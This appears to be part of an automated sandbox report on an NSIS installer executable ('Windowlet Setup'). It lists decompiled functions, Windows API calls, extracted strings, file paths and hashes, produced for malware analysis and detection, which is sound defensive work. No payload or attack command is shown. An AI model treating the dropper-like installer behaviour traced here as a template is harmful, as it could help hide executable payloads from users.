SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
IsWindowEnabled.USER32(00000000), ref: 00403D01
GetDlgItem.USER32(?,00000001), ref: 00403DAF
GetDlgItem.USER32(?,00000002), ref: 00403DB9
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
GetDlgItem.USER32(?,00000003), ref: 00403ECA
ShowWindow.USER32(00000000,?), ref: 00403EEB
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
EnableWindow.USER32(?,?), ref: 00403F18
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
EnableMenuItem.USER32(00000000), ref: 00403F35
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
lstrlenW.KERNEL32(0042D248,?,0042D248,Windowlet Setup), ref: 00403F89
SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
ShowWindow.USER32(?,0000000A), ref: 004040D1

Strings

Windowlet Setup, xrefs: 00403F7A

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Windowlet Setup
API String ID: 3282139019-4145104488
Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D

Function 00403899 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457

lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00000000), ref: 0040391A
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,74DF3420), ref: 0040399A
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\neoimpressionism), ref: 00403A01

Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4

RegisterClassW.USER32(00433E80), ref: 00403A3E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
ShowWindow.USER32(00000005,00000000), ref: 00403AC1
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
RegisterClassW.USER32(00433E80), ref: 00403B03
DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22

Strings

RichEdit20W, xrefs: 00403AE5, 00403AEB
1033, xrefs: 004038B9, 00403915
RichEd20, xrefs: 00403AC7
RichEd32, xrefs: 00403AD5
RichEdit, xrefs: 00403AF4
Control Panel\Desktop\ResourceLocale, xrefs: 004038CD
C:\Users\user\AppData\Local\Temp\, xrefs: 0040389E
C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00403929, 00403931, 004039D4, 004039DA, 004039EA
.DEFAULT\Control Panel\International, xrefs: 00403905
_Nb, xrefs: 00403A1D, 00403A85
.exe, xrefs: 004039A7
: Completed, xrefs: 00403961, 0040396A, 00403978, 004039C7, 004039CD
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 0040389D

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-89682782
Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4Vx2rUlb0f.exe,00000400,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402E1B

Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C29
Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C4B

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4Vx2rUlb0f.exe,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00402E67

Strings

C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
Inst, xrefs: 00402ED3
Error launching installer, xrefs: 00402E3E
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
C:\Users\user\Desktop\4Vx2rUlb0f.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
soft, xrefs: 00402EDC
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Null, xrefs: 00402EE5
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00402DEE

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\4Vx2rUlb0f.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-2199243728
Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C

Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer,?,?,00000031), ref: 004017CD

Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Windowlet Setup,NSIS Error), ref: 0040605D

Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

Strings

C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll, xrefs: 0040182D, 00401849
ExecToStack, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer, xrefs: 00401796

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll$C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer$ExecToStack
API String ID: 1941528284-1317773227
Opcode ID: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
Opcode Fuzzy Hash: c184a2106905ab0827f14b10fddaf5979f1bb1fc4cb028ac84f277b3ec7ab09a
Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D

Function 004051AF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,74DF23A0), ref: 0040520A
SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A

Strings

Completed, xrefs: 004051D0, 004051E0, 004051E6, 00405209, 00405215

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68

Function 00403027 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

... %d%%, xrefs: 0040316E
@, xrefs: 004030AB

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$@
API String ID: 551687249-3859443358
Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA

Function 0040567E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
GetLastError.KERNEL32 ref: 004056D5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
GetLastError.KERNEL32 ref: 004056F4

Strings

C:\Users\user\Desktop, xrefs: 0040567E
C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9

Function 004063BA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
wsprintfW.USER32 ref: 0040640C
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420

Strings

\, xrefs: 004063E2
%s%S.dll, xrefs: 00406406
UXTHEME, xrefs: 004063C3

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8

Function 00405C54 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C72
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D

Strings

nsa, xrefs: 00405C61
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 00405C54

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1566987531
Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
